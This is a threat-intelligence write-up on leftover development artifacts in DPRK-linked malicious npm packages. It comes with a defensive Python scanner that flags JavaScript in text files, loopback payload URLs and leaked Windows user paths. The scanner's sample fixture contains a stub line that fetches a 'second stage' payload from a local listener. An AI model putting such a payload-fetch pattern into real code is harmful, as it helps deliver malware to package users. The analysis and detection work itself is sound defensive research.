Exposed DPRK reference malware and logs

2026-02-16 Kmsec

https://kmsec.uk/blog/dprk-opsec-2/


KMSEC documents two accidental operational-security exposures linked to FAMOUS CHOLLIMA npm activity. Several malicious packages published between July and September 2025 shipped an `ordinary.txt` file containing JavaScript source that appears to be the reference copy of the payload from before it was modified and obfuscated: the code comments are intact and the payload server is a local listener on port 4444. Separately, an `err.log` file left in the `some-promise` package exposed a Windows filesystem path, the operator username `dvant`, and evidence that the actor was editing the legitimate `any-promise` package in place before publishing the malicious version under a different name. These artifacts are not detection indicators in themselves, but they give useful context on how DPRK-linked npm malware is developed and on the mistakes operators make along the way.
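Both exposures are development leftovers that a reviewer can hunt for in any published package: JavaScript shipped under a non-code extension, a loopback payload URL, and a log file leaking a Windows profile path that names a different project tree than the package being published. The scanner below is an added example written for this summary; it is not KMSEC's tooling and not code from the packages described. The sample package contents are constructed to mirror the artifacts named above (the user name, path layout and URL path are placeholders, not values from the real files), and the rule names and thresholds are this example's own choices.

```python
"""Hunt for leftover development artifacts in an npm package.

Added example, not KMSEC's tooling. The heuristics mirror the two exposures
described in the summary: a JavaScript reference file shipped under a
text extension and pointing at a loopback payload server, and a log file
that leaks the operator's local path and the upstream project being edited.
"""
import json
import os
import sys

import re

# Extensions that should not normally contain executable JavaScript.
# README.md is deliberately excluded: markdown code snippets would be noisy.
TEXT_EXTENSIONS = {".txt", ".log"}

# Syntactic tells that a file body is JavaScript rather than prose.
JS_TOKENS = re.compile(r"(?:\brequire\(|\bmodule\.exports|\bfunction\b|=>|\bconst\s+\w+\s*=)")

# http(s) URLs pointing at the publishing host itself; a published package
# has no reason to fetch anything from loopback, so this is a leftover.
LOOPBACK_URL = re.compile(r"https?://(?:127\.0\.0\.1|localhost|0\.0\.0\.0)(?::(\d+))?")

# Windows per-user profile paths reveal the operator's username and the
# directory tree the code was actually built in.
WIN_USER_PATH = re.compile(r"[A-Za-z]:\\Users\\([\w.-]+)((?:\\[\w.-]+)*)")


def scan_files(files):
    """files: {relative_path: text}. Returns a list of (rule, path, detail) tuples."""
    findings = []
    try:
        pkg_name = json.loads(files.get("package.json", "{}")).get("name")
    except json.JSONDecodeError:
        pkg_name = None
    for path, body in files.items():
        ext = os.path.splitext(path)[1].lower()
        if ext in TEXT_EXTENSIONS and JS_TOKENS.search(body):
            findings.append(("js_in_text_file", path, ext))
        for m in LOOPBACK_URL.finditer(body):
            findings.append(("loopback_url", path, m.group(0)))
        for m in WIN_USER_PATH.finditer(body):
            user, rest = m.group(1), m.group(2)
            findings.append(("windows_user_path", path, user))
            # A leaked path that never mentions the published package name
            # suggests the code was edited inside another (likely upstream)
            # project tree and renamed only at publish time.
            segments = [s for s in rest.split("\\") if s]
            if pkg_name and pkg_name not in segments:
                findings.append(("path_not_under_package", path, "\\".join(segments)))
    return findings


def scan_dir(root):
    """Read every file under an unpacked package directory and scan it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                files[rel] = fh.read()
    return scan_files(files)


# Constructed sample package (placeholder contents, not the real files).
SAMPLE = {
    "package.json": '{"name": "some-promise", "version": "1.0.0", "main": "index.js"}',
    "index.js": "module.exports = require('./lib');\n",
    "ordinary.txt": (
        "// reference copy kept while building the obfuscated version\n"
        "const http = require('http');\n"
        "// fetch second stage from the local test listener\n"
        "http.get('http://127.0.0.1:4444/payload', res => { /* ... */ });\n"
    ),
    "err.log": r"""Error: ENOENT: no such file or directory, open 'C:\Users\example-user\work\any-promise\register.js'
    at Object.openSync (node:fs:601:3)
    at Object.<anonymous> (C:\Users\example-user\work\any-promise\index.js:3:15)
""",
}

if __name__ == "__main__":
    results = scan_dir(sys.argv[1]) if len(sys.argv) > 1 else scan_files(SAMPLE)
    for rule, path, detail in results:
        print(f"{rule:24} {path:20} {detail}")
```

Run it against an unpacked tarball (`npm pack <name>` then extract) to triage a package, or with no argument to see the findings on the constructed sample. The rules are intentionally loose: a loopback URL or a stray `.txt` full of JavaScript is a reason to look closer, not a verdict, which matches the summary's point that these artifacts are context rather than indicators.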

Indicators of Compromise

Type   Value                               First Seen   Last Seen
HASH   dcde20e9104c953246a379a54c2292e…    2026-02-16   2026-02-16
HASH   02fa6ff6ea920eb38ab040a2f2debef…    2026-02-16   2026-02-16
HASH   c5e75f4641a5add4516c6785c345416…    2026-02-16   2026-02-16
